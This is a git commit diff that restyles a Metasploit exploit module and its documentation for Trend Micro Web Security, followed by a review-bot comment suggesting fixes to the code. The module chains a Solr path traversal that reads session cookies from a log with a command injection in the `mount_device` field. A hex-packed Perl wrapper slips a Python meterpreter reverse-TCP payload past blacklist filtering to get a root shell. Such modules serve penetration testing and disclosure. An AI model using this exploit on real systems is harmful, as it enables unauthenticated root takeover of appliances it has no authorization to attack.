fixing up some styles and such
parent
260607e8f9
commit
6a3633c2c0
|
@ -7,22 +7,22 @@ The specific flaw exists within the `LogSettingHandler` class of administrator i
|
|||
parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage
|
||||
this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability.
|
||||
|
||||
Another specific flaw exists within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this
|
||||
Another specific flaw exists within the proxy service, which listens on port `8080` by default. Unauthenticated users can exploit this
|
||||
vulnerability to communicate with internal services in the product.
|
||||
|
||||
Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file
|
||||
Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the `file`
|
||||
parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this
|
||||
vulnerability to disclose information in the context of IWSS user.
|
||||
vulnerability to disclose information in the context of the `IWSS` user.
|
||||
|
||||
Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
|
||||
Due to a combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the `root` user.
|
||||
|
||||
Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
|
||||
Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
|
||||
|
||||
**Vulnerable Application Installation Steps**
|
||||
### Vulnerable Application Installation Steps
|
||||
|
||||
Trend Micro Web Security is distrubed as an ISO image by Trend Micro.
|
||||
|
||||
Following steps are valid on the CentOS 6 x64 bit operating system.
|
||||
The following steps are valid on the CentOS 6 x64 bit operating system.
|
||||
|
||||
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
|
||||
2. Find "InterScan Web Security Virtual Appliance" and click.
|
||||
|
@ -37,7 +37,7 @@ Following steps are valid on the CentOS 6 x64 bit operating system.
|
|||
- 8 GB of memory at least.
|
||||
- 60 GB of disk size at least.
|
||||
|
||||
**Why Perl wrapper for python stager?**
|
||||
### Why perl wrapper for python stager?
|
||||
|
||||
Within the exploit function, you can see a custom Perl wrapper usage for python stager payload. The parameter that contains our payload is
|
||||
going through escaping (double quotes, backslash, etc) and blacklist checks on the server-side. Most of the cmd payload will not work under
|
||||
|
@ -63,13 +63,13 @@ contain any special characters.
|
|||
5. Run `check`
|
||||
6. **Verify** that you are seeing `The target is vulnerable.`
|
||||
7. Run `exploit`
|
||||
8. **Verify** that you are seeing `Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858` in console.
|
||||
8. You should get a root shell
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
This module has been tested against Trend Micro Web Security 6.5-SP2_Build_Linux_1852.
|
||||
### Trend Micro Web Security 6.5-SP2_Build_Linux_1852
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/trendmicro_websecurity_exec
|
||||
|
|
|
@ -8,12 +8,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
|
||||
'Description' => %q{
|
||||
'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits multiple vulnerabilities together in order to achive a remote code execution.
|
||||
Unauthenticated users can execute a terminal command under the context of the root user.
|
||||
|
||||
|
@ -27,18 +27,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
Last but not least a flaw exists within the Apache Solr application, which is installed within the product.
|
||||
When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
|
||||
An attacker can leverage this vulnerability to disclose information in the context of IWSS user.
|
||||
An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.
|
||||
|
||||
Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
|
||||
|
||||
Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
|
||||
],
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2020-8604'],
|
||||
['CVE', '2020-8605'],
|
||||
|
@ -47,25 +47,25 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
['ZDI', '20-677'],
|
||||
['ZDI', '20-678']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'payload' => 'python/meterpreter/reverse_tcp',
|
||||
'WfsDelay' => 30
|
||||
'WfsDelay' => 30
|
||||
},
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-bind'
|
||||
}
|
||||
},
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'DisclosureDate' => '2020-06-10',
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultTarget' => 0,
|
||||
'Notes' =>
|
||||
{
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
@ -92,19 +92,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
port_restore = datastore['RPORT']
|
||||
datastore['RPORT'] = datastore['PROXY_PORT']
|
||||
|
||||
@jsessionid = ""
|
||||
@jsessionid = ''
|
||||
|
||||
# We are exploiting proxy service vulnerability in order to fetch content of catalina.out file
|
||||
print_status('Trying to extract session ID by exploiting reverse proxy service')
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
|
||||
'vars_get' => {
|
||||
'command' => 'filecontent',
|
||||
'wt' => 'filestream',
|
||||
'generation' => 1,
|
||||
'file' => "../"*7 << "var/iwss/tomcat/logs/catalina.out",
|
||||
'method' => 'GET',
|
||||
'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
|
||||
'vars_get' => {
|
||||
'command' => 'filecontent',
|
||||
'wt' => 'filestream',
|
||||
'generation' => 1,
|
||||
'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'
|
||||
}
|
||||
})
|
||||
|
||||
|
@ -132,20 +132,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
print_good("Extracted number of JSESSIONID : #{cookies.length}")
|
||||
print_good("Extracted number of JSESSIONID: #{cookies.length}")
|
||||
|
||||
# We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.
|
||||
datastore['SSL'] = true if ssl_restore
|
||||
datastore['RPORT'] = port_restore
|
||||
|
||||
# Latest cookie in the log file is the one most probably active. So that we use reverse on array.
|
||||
cookies.reverse.each_with_index do |cookie, index|
|
||||
cookies.reverse.each_with_index do |cookie, index|
|
||||
print_status("Testing JSESSIONID ##{index} : #{cookie}")
|
||||
|
||||
# This endpoints is basically check session :)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
|
||||
'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
|
||||
'cookie' => "JSESSIONID=#{cookie}"
|
||||
})
|
||||
|
||||
|
@ -156,12 +156,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# If the cookie is active !
|
||||
if res.code == 200 && res.body.include?('session_flag')
|
||||
print_good("Awesome !!! JESSIONID ##{index} is active.")
|
||||
print_good("Awesome!!! JESSIONID ##{index} is active.")
|
||||
@jsessionid = cookie
|
||||
break
|
||||
end
|
||||
|
||||
print_warning("JSESSIONID ##{index} is inactive ! Moving to the next one.")
|
||||
print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
|
||||
end
|
||||
|
||||
if @jsessionid.empty?
|
||||
|
@ -217,20 +217,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# For that reason, I am planting our payload dropper within the perl command.
|
||||
|
||||
cmd = "python -c \"#{payload.encoded}\""
|
||||
final_payload = cmd.to_s.unpack("H*").first
|
||||
final_payload = cmd.to_s.unpack1('H*')
|
||||
p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
|
||||
|
||||
vars_post = {
|
||||
mount_device: "mount $(#{p}) /var/offload",
|
||||
cmd: 'mount'
|
||||
mount_device: "mount $(#{p}) /var/offload",
|
||||
cmd: 'mount'
|
||||
}
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
|
||||
'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
|
||||
'cookie' => "JSESSIONID=#{@jsessionid}",
|
||||
'ctype' => 'application/json',
|
||||
'data' => vars_post.to_json
|
||||
'ctype' => 'application/json',
|
||||
'data' => vars_post.to_json
|
||||
})
|
||||
end
|
||||
end
|
||||
|
|
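Review bot: The success message in the hunk starting `@ -156,12` names the cookie `JESSIONID` while the log line and the warning in the same loop use `JSESSIONID`, so the typo survives this restyle; change it to `print_good("Awesome!!! JSESSIONID ##{index} is active.")`. The `res.code == 200` comparison two lines above it will raise NoMethodError if `send_request_cgi` returned nil on a connection failure, and the lines between this hunk and the previous one are not shown, so if no `unless res` guard exists there one should be added before that check. In the hunk starting `@ -217,20` the local `p` shadows `Kernel#p`, which reads poorly in a method that already builds several command strings; a name such as `perl_wrapper` would be clearer. The enclosing methods begin outside each of these hunks.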